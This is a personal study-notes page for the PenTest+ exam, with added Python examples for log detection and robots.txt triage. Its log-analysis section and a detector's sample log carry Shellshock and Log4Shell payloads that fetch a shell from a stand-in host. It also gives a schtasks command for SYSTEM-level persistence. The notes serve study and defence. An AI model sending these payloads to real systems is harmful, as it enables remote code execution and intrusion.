
pentest + notes

i am currently preparing to take the pentest plus exam soon & want to share my notes.

General Notes:

  • Lateral movement is the primary focus when using CrackMapExec in a penetration test: it leverages credentials already obtained to move to other machines within the network.

  • nslookup is used to query the Domain Name System to obtain the mapping between a domain name and an IP address. Using set type=ns tells nslookup to report only information on name servers (using set type=mx, you would receive only information about mail exchange (MX) servers).

  • Modbus, used in ICS, is often targeted by attacks that manipulate its registers, otherwise known as register manipulation.

  • An SNMP scan can provide a lot of detail on the devices on a network. SNMP also uses community strings as a basic authentication mechanism before allowing access; with this information, we can identify an SNMP exploit taking place.

  • if you are running WinRM to run commands to another remote windows host with WinRM enabled, you would use winrs -r:target-ip to run commands on the remote machine.
    • net use \\target-ip\C$ /user:Administrator is for connecting to shared resources using SMB
    • psexec \\target-ip cmd.exe would be for using PsExec to execute commands remotely
    • ssh Administrator@target-ip is an SSH command, which is not used for WinRM
  • A URL filter would be used to block a website based on its website address or URL; it isn't a containment technique but a blocking and filtering technique.
    • Quarantine would be used against an infected machine, and it would not be effective against trying to block access to a given website across the entire organization.
    • An application blocklist is used to prevent an application from running, so this cannot be used to block a single malicious or suspicious website or URL.
  • Tenable Nessus is an excellent choice for Vulnerability Management as it integrates well with existing processes, provides automated updates, and offers detailed risk insights.
    • OpenVAS is also a vulnerability scanner but lacks the extensive integration and management features of Nessus.
  • The JetDirect protocol commonly uses SNMP protocol to interact with network printers.
    • HTTP provides web-based, and HTTPS provides secure web-based management but they are not the primary protocols used by JetDirect for monitoring.
  • systemctl stop command only halts the service in its current session, it doesn’t stop it from starting on boot if it is enabled.

  • Full packet capture records the complete payload of every packet crossing the network. The other methods will not provide sufficient information to detect a cleartext password being sent.

  • Passive information gathering consists of numerous activities where the penetration tester gathers open-source or publicly available information without the organization under investigation being aware that the information has been accessed.
    • Active information gathering starts to probe the organization using DNS Enumeration, Port Scanning, and OS Fingerprinting techniques.
  • ![[file-20251119111950852.png]]
  • The rule header is set to alert only on TCP packets based on this IDS rule’s first line. The flow condition is set as “to_client,established,” which means that only inbound traffic will be analyzed against this rule and only inbound traffic for connections that are already established.

  • ![[file-20251119112246679.png]]
  • This is an example of SQL Injection

  • An XML Schema Definition (XSD) is a recommendation that enables developers to define the structure and data types for XML documents.

  • While a malicious employee or insider could use all of the methods listed to obtain another user’s passwords, shoulder surfing is the MOST likely to be used.

  • PowerShell is the most appropriate scripting language for automating tasks on a Windows machine, including looping through IP addresses to retrieve banner information.
    • While Bash is typically used in Unix/Linux environments and Python is a versatile option that could also handle this task, PowerShell is specifically designed for automation in Windows environments.
  • Transforms are the core feature in Maltego that automates the discovery and mapping of related entities. By running transforms, you can gather additional data points like subdomains, email addresses, and other connected entities that are crucial for building a comprehensive view of the target’s infrastructure.

  • If the scan reveals no open ports, it’s possible that the scan’s IP range was configured incorrectly, and not all targets were included.

  • Evil-WinRM is a tool primarily used for remotely executing PowerShell commands on a Windows machine with administrative privileges, which is particularly useful for post-exploitation tasks.

  • The amass enum -passive command is designed for passive DNS enumeration, which collects data from various sources without directly interacting with the target’s servers, reducing the risk of detection.

  • You have entered the following URL, https://www.google.com/search?q=*%40diontraining.com.
    • Google interprets this statement as @diontraining.com and understands that the user is searching for email addresses, since %40 is the hex code for the @ symbol. The * is a wildcard character, meaning that any text could be substituted for the * in the query. This type of search would provide an attacker with a list of email addresses associated with diontraining.com.
  • Which of the following commands would he use to launch an SQL injection attack against the “id” parameter in the URL “http://target.com/product.php?id=5”?
    • The correct command uses SQLmap to test the “id” parameter for SQL injection vulnerabilities, with --dbs to enumerate databases and --level=5 for a more thorough test.

  • Radio-frequency identification (RFID) uses electromagnetic fields to automatically identify and track tags attached to objects. NFC is a subset of RFID used for short-range communication. Infrared technology is used for remote controls and certain types of wireless communication, while Bluetooth is used for exchanging data over short distances.

digital certificate reconnaissance

  • The Certificate Revocation List (CRL) is a list of digital certificates that have been revoked by a Certificate Authority (CA) before their scheduled expiration date. These certificates are no longer valid and may be checked during passive reconnaissance to identify revoked certificates.

  • The Subject Alternative Name (SAN) is a field in a digital certificate that allows a single certificate to support multiple domain names or hostnames.

  • Certificate Signing Request (CSR) is a file generated by a device or server that contains identifying information and is submitted to a CA when requesting a digital certificate.

  • Certificate Transparency (CT) Logs are used to keep track of all SSL/TLS certificates issued by certificate authorities. By querying these logs, a penetration tester can identify all certificates that have been issued for a particular domain, including any subdomains or similar domains that could be used for phishing.

  • SQL injections target the data stored in enterprise databases by exploiting flaws in client-facing applications. These vulnerabilities being exploited are most often found in web applications.

Nmap

types of Nmap scans:

  • TCP SYN scan - identify open ports and running services while minimizing the risk of detection.

  • A TCP Connect Scan initiates a full TCP three-way handshake, making it the noisiest scan because the connection is fully established. This scan is easily detected by intrusion detection systems (IDS) and logs on the target system, making it unsuitable when attempting to minimize detection.

  • A UDP scan can be used to identify open UDP ports. However, it is generally slower and less reliable than TCP scans because it needs to wait for a timeout if there is no response from the target. Additionally, it is often noisier than SYN scans due to the number of requests made and the need to time out on each port.

  • The XMAS Tree scan sends packets with multiple flags set (FIN, URG, PSH), and if no response is received, the port is considered open. This scan is relatively stealthy, but it may not work reliably on all systems, especially modern firewalls and systems using the latest security measures.

nmap scanning techniques

  • nmap -sO (IP protocol scan) - allows you to determine which IP protocols (TCP, ICMP, IGMP, etc.) are supported by target machines.

  • The nmap -A command is used for a comprehensive scan that includes service version detection and OS fingerprinting.

To collect detailed information, the -O option in Nmap enables OS detection, and -sV performs service version detection. Other flags like -T5 or -sU focus on speed or different scan types, but they don’t gather the required detailed data.

nmap scripting engine

  • Transport Layer Security (TLS) is a widely adopted security protocol designed to facilitate privacy and data security for communications over the internet. A primary use case of TLS is encrypting the communication between web applications and servers, such as web browsers loading a website. TLS was developed in 1999 as SSLv3.1, but its name was changed to separate itself from Netscape, which developed the original SSL protocol. Because of this history, the terms TLS and SSL are often used interchangeably. Secure Sockets Layer had three versions: SSLv1, SSLv2, and SSLv3. All of these versions of SSL are considered obsolete and insecure.

Cloud based tooling & Recon

know the difference in cloud security tools

  • Prowler is an AWS security assessment tool that checks for compliance with best practices and identifies potential security risks.
  • Docker Bench is used for Docker container security.
  • Kube-hunter focuses on Kubernetes.
  • ScoutSuite is a multi-cloud security auditing tool.

discovering secrets in git repos

Trivy can scan Git repositories to identify secrets like API keys, passwords, and other sensitive information that may have been committed. This makes it a versatile tool for securing containers and also code repositories. Burp Suite, Hydra, and John the Ripper are designed for web application security, brute-force attacks, and password cracking, respectively, and do not offer the same repository scanning capabilities.

know what an XSD project file is

An XML Schema Definition (XSD) is a recommendation that enables developers to define the structure and data types for XML documents. If the company provides this support resource to you, you will know the exact format expected by the application, which can save you a lot of time, and the organization a lot of expense, during the assessment. Since this scenario stated that this was a known-environment assessment, it would be acceptable for the penetration tester to ask for the organization’s XSD document as a support resource.

Attack types

side channel attack

  • A side-channel attack involves manipulating or measuring physical properties of shared resources, such as CPU cache, to infer information about other processes running on the same hardware. In cloud environments, this can allow attackers to gain unauthorized access to sensitive data from other tenants on the same physical server.

on-path-attack

  • An on-path attack (formerly known as a man-in-the-middle attack) intercepts communications between two systems. For example, in an HTTP transaction, the target is the TCP connection between client and server. Using different techniques, the attacker splits the original TCP connection into two new connections, one between the client and the attacker and the other between the attacker and the server. This often uses IP spoofing to trick a victim into connecting to the attacker.

Cross site scripting attack (XSS)

If your website’s HTML code does not perform input validation to remove scripts that may be entered by a user, then an attacker can create a popup window that collects passwords and uses that information to compromise other accounts further. Tools like BeEF are used to accomplish this.

BeEF - BeEF (Browser Exploitation Framework) is a penetration testing tool included with Kali Linux that focuses on web browsers. BeEF can be used for XSS and injection attacks against a website.

Cross site request forgery (CSRF)

A cross-site request forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they are currently authenticated. A CSRF would allow an attacker to induce a victim to perform actions they do not intend to perform. A rootkit is a set of software tools that enable an unauthorized user to control a computer system without being detected.

FTP CANNOT be used to conduct a banner grab.

A cybersecurity analyst or penetration tester uses a banner grab to gain information about a computer system on a network and the services running on its open ports. Administrators can use this to take inventory of the systems and services on their network. This is commonly done using telnet, wget, or netcat.

Hunter.io - email reconnaissance

The Finder with Filters in Hunter.io enables you to narrow down search results based on specific criteria, such as job title or department, helping you target emails from particular roles within an organization.

  • Domain Search provides general email addresses.
  • Bulk Email Finder is for multiple searches.
  • Email Verifier checks the validity of individual emails.

WSDL vs Swagger

WSDL is a machine-readable XML file for SOAP services, while Swagger (now the OpenAPI Specification) is a human-readable specification for REST APIs

Swagger = REST API; WSDL = SOAP

scheduled tasks

A scheduled task or scheduled job is an instance of execution, like initiating a process or running a script, that the system performs on a set schedule. Once the task executes, it can prompt the user for interaction or run silently in the background; it all depends on what the task is set up to do. Scheduled tasks in Windows use the schtasks command. The correct answer for this persistence is to enter the command “schtasks /create /tn beacon /tr C:\temp\beacon.bat /sc MINUTE /mo 20 /ru SYSTEM”, which will create a task called “beacon” that runs the script at “C:\temp\beacon.bat” every 20 minutes as the SYSTEM-level user.

tcpdump commands

  • The tcpdump command to capture only HTTP GET requests on interface eth0 is tcpdump -i eth0 "tcp port 80 and tcp[32:4] = 0x47455420". This command filters packets to capture only those on port 80 (HTTP) where the TCP payload begins with “GET ” (0x47455420 in hex).
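The filter above compares the four bytes at a fixed offset of 32 into the TCP segment, which is only the start of the payload when the TCP header is exactly 32 bytes long (20 bytes plus 12 bytes of options). The following Python is an added example, not part of the original notes or of tcpdump: it reads the Data Offset field from the header to find the payload wherever it starts, and contrasts that with the literal fixed-offset check. The TCP segments are constructed in the script (dummy ports, sequence numbers and checksum), not captured traffic.

```python
"""
Added example: decide whether a raw TCP segment carries an HTTP GET by honouring
the TCP Data Offset field, versus the fixed tcp[32:4] = 0x47455420 comparison.
"""
import struct

GET_PREFIX = b"GET "  # 0x47455420 as bytes


def tcp_payload(segment: bytes) -> bytes:
    """Return the payload of a raw TCP segment.

    Byte 12 of the TCP header holds the data offset (header length in 32-bit
    words) in its high nibble, so header_len = ((segment[12] & 0xF0) >> 4) * 4.
    """
    if len(segment) < 20:
        raise ValueError("TCP segment shorter than the minimum 20-byte header")
    header_len = ((segment[12] & 0xF0) >> 4) * 4
    if header_len < 20 or header_len > len(segment):
        raise ValueError(f"invalid data offset: header length {header_len}")
    return segment[header_len:]


def is_http_get(segment: bytes) -> bool:
    """True when the TCP payload starts with 'GET ' (what the tcpdump filter is after)."""
    return tcp_payload(segment).startswith(GET_PREFIX)


def fixed_offset_matches(segment: bytes) -> bool:
    """Mimic tcpdump's tcp[32:4] = 0x47455420 literally: compare the 4 bytes at offset 32."""
    return segment[32:36] == GET_PREFIX


def build_segment(header_len: int, payload: bytes) -> bytes:
    """Construct a minimal TCP segment (constructed test data, not captured traffic).

    Ports, seq/ack, window and checksum are dummy values; only the Data Offset
    nibble matters for this demonstration.
    """
    if header_len % 4 != 0 or not 20 <= header_len <= 60:
        raise ValueError("TCP header length must be a multiple of 4 between 20 and 60")
    data_offset_byte = (header_len // 4) << 4
    base = struct.pack(
        "!HHIIBBHHH",
        40000, 80,          # source / destination port
        1, 1,               # sequence / acknowledgement numbers
        data_offset_byte,   # data offset (high nibble) + reserved bits
        0x18,               # flags: PSH | ACK
        65535, 0, 0,        # window, checksum (unset), urgent pointer
    )
    options = b"\x01" * (header_len - 20)  # NOP padding stands in for real options
    return base + options + payload


if __name__ == "__main__":
    request = b"GET /robots.txt HTTP/1.1\r\nHost: example.test\r\n\r\n"
    with_options = build_segment(32, request)  # 12 bytes of options, common on Linux stacks
    no_options = build_segment(20, request)    # bare 20-byte header
    print("32-byte header:", is_http_get(with_options), fixed_offset_matches(with_options))
    print("20-byte header:", is_http_get(no_options), fixed_offset_matches(no_options))
```

Run it and the second line shows the practical caveat: with a bare 20-byte header the offset-aware check still recognises the GET, while the fixed-offset comparison looks 12 bytes into the payload and misses it. A header-length-aware BPF expression is possible, but the exam answer is the simpler fixed-offset form.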

bash

The most efficient and reliable way to compare the contents of two files in Bash is by using cmp -s file1 file2. This command performs a byte-by-byte comparison, exits immediately upon finding a difference, and works with both text and binary files—making it ideal for scripting tasks where speed and accuracy are important.

Authentication Attacks

  • Pass-the-token attack, an attacker uses intercepted authentication IDs/tokens to impersonate a user without needing their password.
  • Pass-the-hash and Pass-the-ticket attacks use different types of credentials.
  • Brute force attack attempts to guess the password through repeated attempts.

DNS Record types

  • Service Records (SRV) - are used to provide host and port information on services such as voice over IP (VoIP) and instant messaging (IM) applications.
  • Mail Exchange (MX) records - are used to provide the mail server that accepts email messages for a particular domain.
  • Nameserver (NS) records - are used to list the authoritative DNS server for a particular domain.
  • Text Records (TXT) - are used to provide information about a resource such as a server, network, or service in human-readable form. They often contain domain verification and domain authentications for third-party tools that can send information on behalf of a domain name.

Enumeration tools

  • enum4linux - is specifically designed to enumerate information from Windows systems, such as user accounts, shared resources, and password policies.
  • tcpdump - is used for packet capturing.
  • netcat - is a network utility for reading from and writing to network connections.
  • traceroute - is used for tracing the route packets take to a network host.

Risk Assessment Types

  • qualitative risk assessment - it categorizes things based on the likelihood and impact of a given incident using non-numerical terms, such as high, medium, and low.
  • quantitative risk - If the risk assessment provided exact numbers or percentages of risk, then it would be a quantitative risk assessment.

Robots.txt & User-Agent Analysis for PenTest+

1. Understanding robots.txt

What You Saw in the robots.txt File

User-agent: *
Disallow: /admin
Disallow: /wpadmin
Disallow: /backup
Disallow: /config
Disallow: /.git
Disallow: /api/v1/
Disallow: /test

Why This Matters

These entries reveal hidden or sensitive directories useful during pentesting.


2. Purpose of robots.txt

Intended Purpose

  • Tell search engine crawlers which paths not to index.

Actual Security Impact

  • Reveals hidden directory structures.
  • Leads attackers directly to sensitive areas.

3. High-Risk Directories in robots.txt

Admin Panels

Disallow: /admin
Disallow: /administrator
Disallow: /wpadmin
Disallow: /wp-admin
Disallow: /cpanel
Disallow: /manager

Sensitive Data

Disallow: /backup
Disallow: /backups
Disallow: /db
Disallow: /sql
Disallow: /config
Disallow: /.env

Version Control Repositories

Disallow: /.git
Disallow: /.svn
Disallow: /.hg

API Endpoints

Disallow: /api/
Disallow: /api/v1/
Disallow: /api/v2/
Disallow: /graphql

Development / Test Environments

Disallow: /dev
Disallow: /test
Disallow: /staging
Disallow: /demo
Disallow: /tmp

4. Why These Entries Matter During Pentesting

1. Information Disclosure

curl http://target.com/admin
wget -r http://target.com/.git/

2. Hidden Functionality Discovery

Disallow: /api/v1/users
Disallow: /api/v1/admin
Disallow: /debug
Disallow: /phpinfo.php

5. User-Agent Entries in robots.txt

Legitimate Examples

User-agent: Googlebot
Disallow: /private/

User-agent: *
Disallow: /admin/

Suspicious User-Agent Rules

User-agent: totally-not-a-scanner
Disallow: /honeypot/

User-agent: sqlmap
Disallow: /

User-agent: nmap
Disallow: /

User-agent: nikto
Disallow: /

6. User-Agent in Other Contexts

Typical Browser Activity

GET / HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

Malicious Indicators in Logs

User-Agent: sqlmap/1.4.7
User-Agent: Nikto/2.1.6
User-Agent: Nessus/8.13.1

# Shellshock
User-Agent: () { :; }; /bin/bash -c "wget http://evil.com/shell.sh"

# Log4Shell
User-Agent: ${jndi:ldap://evil.com/a}
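The indicators listed above (self-identifying scanner names, the Shellshock "() {" function-export prefix and the Log4Shell "${jndi:" lookup) are easy to turn into a log check. The Python below is an added example, not part of the original notes: it parses access-log lines in the common "combined" format and reports every request whose User-Agent matches one of those indicators. The log lines are constructed samples (203.0.113.x and attacker.example are documentation placeholders), not real traffic.

```python
"""
Added example: flag suspicious User-Agent strings in web-server access logs,
using the scanner names and payload patterns discussed in these notes.
"""
import re

# Combined log format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>.*)"$'
)

# Tools that announce themselves in the User-Agent header (matched case-insensitively).
SCANNER_NAMES = ("sqlmap", "nikto", "nessus", "nmap", "masscan", "gobuster", "dirbuster")

# Exploit payload shapes that have no business in a User-Agent header.
PAYLOAD_PATTERNS = {
    "shellshock": re.compile(r"\(\)\s*\{"),                  # "() {" bash function export
    "log4shell": re.compile(r"\$\{\s*jndi:", re.IGNORECASE),  # ${jndi:...} JNDI lookup
}


def classify_user_agent(ua: str) -> list:
    """Return indicator labels for one User-Agent string (empty list if it looks benign)."""
    hits = []
    lowered = ua.lower()
    for name in SCANNER_NAMES:
        if name in lowered:
            hits.append(f"scanner:{name}")
    for label, pattern in PAYLOAD_PATTERNS.items():
        if pattern.search(ua):
            hits.append(f"payload:{label}")
    return hits


def scan_log(lines):
    """Yield (ip, request, user_agent, indicators) for each line with a suspicious User-Agent."""
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # malformed line; a real pipeline would count these separately
        indicators = classify_user_agent(match["ua"])
        if indicators:
            yield match["ip"], match["request"], match["ua"], indicators


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [19/Nov/2025:11:19:50 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
    '203.0.113.9 - - [19/Nov/2025:11:20:01 +0000] "GET /product.php?id=5 HTTP/1.1" 200 733 "-" '
    '"sqlmap/1.4.7"',
    '203.0.113.9 - - [19/Nov/2025:11:20:02 +0000] "GET /admin HTTP/1.1" 403 199 "-" '
    '"Nikto/2.1.6"',
    '203.0.113.12 - - [19/Nov/2025:11:21:14 +0000] "GET /cgi-bin/status HTTP/1.1" 200 0 "-" '
    '"() { :; }; /bin/bash -c \\"wget http://attacker.example/shell.sh\\""',
    '203.0.113.15 - - [19/Nov/2025:11:22:30 +0000] "GET /login HTTP/1.1" 200 1024 "-" '
    '"${jndi:ldap://attacker.example/a}"',
]

if __name__ == "__main__":
    for ip, request, ua, indicators in scan_log(SAMPLE_LOG):
        print(f"{ip:14s} {', '.join(indicators):22s} {request!r} UA={ua!r}")
```

The browser line produces no output; the other four are reported with the indicator that matched. A User-Agent is attacker-controlled text, so these matches are leads for triage rather than proof of compromise, and the absence of a match says nothing about a scanner that spoofs a browser string.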

7. Pentesting Workflow with robots.txt

Step 1: Retrieve robots.txt

curl http://target.com/robots.txt
wget http://target.com/robots.txt

Step 2: Enumerate Disallowed Directories

curl http://target.com/backup/
curl http://target.com/backup.zip
curl http://target.com/backup.tar.gz
curl http://target.com/backup/database.sql

Step 3: Use Automated Tools

nikto -h http://target.com
gobuster dir -u http://target.com -w robots-disallowed.txt

8. Common Exam Scenarios

Scenario 1

User-agent: *
Disallow: /admin
Disallow: /.git
Disallow: /backup
Disallow: /api/keys

Investigate first: /.git or /api/keys

Scenario 2

Entry suggesting WordPress: /wp-admin


9. Quick Reference — Suspicious robots.txt Entries

Entry                     Why It Matters
/admin, /administrator    Admin login panels
/wp-admin, /wpadmin       WordPress admin
/.git, /.svn              Source code disclosure
/backup, /backups         Backup file exposure
/api/, /api/v1/           API endpoints
/config, /.env            Configuration + secrets
/test, /dev               Development content
/phpmyadmin               Database interface
/.htaccess, /.htpasswd    Apache config
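Sections 1 to 3 and the quick-reference table above amount to a small triage procedure: fetch robots.txt, group the Disallow lines by User-agent, and sort the paths into risk categories. The Python below is an added example, not part of the original notes: it parses robots.txt text (comments, blank lines, case-insensitive directives, and several User-agent lines sharing one rule block) and ranks each disallowed path against the categories in the table, also noting rules keyed on scanner user-agents such as sqlmap or nikto. The robots.txt content is a constructed sample assembled from the entries shown in these notes; the category names and the scanner-agent list are this example's own choices.

```python
"""
Added example: parse a robots.txt file and triage what it discloses, using the
high-risk path categories from the quick-reference table above.
"""
from collections import defaultdict

# Category -> path prefixes, taken from the quick-reference table (names are this example's).
HIGH_RISK = {
    "admin panel": ("/admin", "/administrator", "/wp-admin", "/wpadmin", "/cpanel", "/manager"),
    "source code disclosure": ("/.git", "/.svn", "/.hg"),
    "backup exposure": ("/backup", "/backups", "/db", "/sql"),
    "configuration / secrets": ("/config", "/.env", "/.htaccess", "/.htpasswd"),
    "api endpoint": ("/api", "/graphql"),
    "development content": ("/dev", "/test", "/staging", "/demo", "/tmp", "/debug", "/phpinfo.php"),
    "database interface": ("/phpmyadmin",),
}

# User-agent names only an attack tool would send; a rule keyed on them suggests the
# site owner is watching for scanners (or running a honeypot), as in section 5.
SCANNER_AGENTS = {"sqlmap", "nmap", "nikto", "totally-not-a-scanner"}


def parse_robots(text: str) -> dict:
    """Return {user_agent: [disallowed paths]} from robots.txt text."""
    rules = defaultdict(list)
    current_agents = []
    last_was_agent = False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments
        if not line or ":" not in line:
            continue
        field, value = (part.strip() for part in line.split(":", 1))
        field = field.lower()
        if field == "user-agent":
            if not last_was_agent:
                current_agents = []  # a new rule block starts here
            current_agents.append(value.lower())
            rules[value.lower()]  # register the agent even if it gets no Disallow lines
            last_was_agent = True
        else:
            last_was_agent = False
            if field == "disallow" and value:
                for agent in current_agents:
                    rules[agent].append(value)
    return dict(rules)


def classify_path(path: str):
    """Return the high-risk category for a disallowed path, or None if it matches none."""
    p = path.rstrip("/").lower() or "/"
    for category, prefixes in HIGH_RISK.items():
        for prefix in prefixes:
            if p == prefix or p.startswith(prefix + "/") or p.startswith(prefix + "."):
                return category
    return None


def triage(text: str) -> dict:
    """Summarise a robots.txt: risky paths per category plus rules aimed at scanner agents."""
    rules = parse_robots(text)
    findings = defaultdict(list)
    for agent, paths in rules.items():
        for path in paths:
            category = classify_path(path)
            if category:
                findings[category].append(path)
    scanner_rules = sorted(agent for agent in rules if agent in SCANNER_AGENTS)
    return {"findings": dict(findings), "scanner_rules": scanner_rules}


# Constructed sample robots.txt built from the entries discussed in these notes.
SAMPLE_ROBOTS = """\
# example robots.txt (constructed sample)
User-agent: *
Disallow: /admin
Disallow: /wpadmin
Disallow: /backup
Disallow: /config
Disallow: /.git
Disallow: /api/v1/
Disallow: /test
Disallow: /public/   # harmless, no category

User-agent: sqlmap
User-agent: nikto
Disallow: /
"""

if __name__ == "__main__":
    report = triage(SAMPLE_ROBOTS)
    for category, paths in report["findings"].items():
        print(f"{category:25s} {', '.join(paths)}")
    print("rules aimed at scanner user-agents:", report["scanner_rules"])
```

For the site owner the same output is a checklist: anything that lands in the "source code disclosure", "backup exposure" or "configuration / secrets" buckets should not be reachable at all, because robots.txt only asks well-behaved crawlers to stay away and offers no access control.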